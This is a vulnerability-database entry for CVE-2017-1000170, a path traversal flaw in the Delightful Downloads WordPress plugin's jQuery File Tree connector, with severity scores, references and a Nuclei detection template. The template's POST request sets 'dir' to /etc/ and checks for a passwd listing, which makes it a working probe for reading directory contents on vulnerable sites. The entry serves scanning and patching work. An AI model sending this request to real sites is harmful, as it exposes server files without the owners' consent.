Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2017-1000170
HistoryMar 23, 2021 - 12:56 p.m.

WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion

2021-03-2312:56:42
ProjectDiscovery
github.com

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.6 High

AI Score

Confidence

High

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.703 High

EPSS

Percentile

98.0%

WordPress Delightful Downloads Jquery File Tree versions 2.1.5 and older are susceptible to local file inclusion vulnerabilities via jqueryFileTree.

id: CVE-2017-1000170

info:
  name: WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion
  author: dwisiswant0
  severity: high
  description: WordPress Delightful Downloads Jquery File Tree versions 2.1.5 and older are susceptible to local file inclusion vulnerabilities via jqueryFileTree.
  impact: |
    Allows an attacker to include arbitrary local files, potentially leading to unauthorized access or code execution.
  remediation: |
    Update to the latest version of Delightful Downloads plugin or apply the patch provided by the vendor.
  reference:
    - https://www.exploit-db.com/exploits/49693
    - https://github.com/jqueryfiletree/jqueryfiletree/issues/66
    - http://packetstormsecurity.com/files/161900/WordPress-Delightful-Downloads-Jquery-File-Tree-1.6.6-Path-Traversal.html
    - https://nvd.nist.gov/vuln/detail/CVE-2017-1000170
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2017-1000170
    cwe-id: CWE-22
    epss-score: 0.70305
    epss-percentile: 0.97752
    cpe: cpe:2.3:a:jqueryfiletree_project:jqueryfiletree:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: jqueryfiletree_project
    product: jqueryfiletree
  tags: cve2017,cve,wordpress,wp-plugin,lfi,jquery,edb,packetstorm,jqueryfiletree_project

http:
  - method: POST
    path:
      - "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"

    body: "dir=%2Fetc%2F&onlyFiles=true"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<li class='file ext_passwd'>"
          - "<a rel='/passwd'>passwd</a></li>"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b9e346f4bc199c5c0d4019c3d55480f4c69a0aa58566ef0af6b1d5097ab3260102204c81a7d73a9c46c562c114589710b19afcd82876e0c9bfce5698a075d42880cf:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.6 High

AI Score

Confidence

High

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.703 High

EPSS

Percentile

98.0%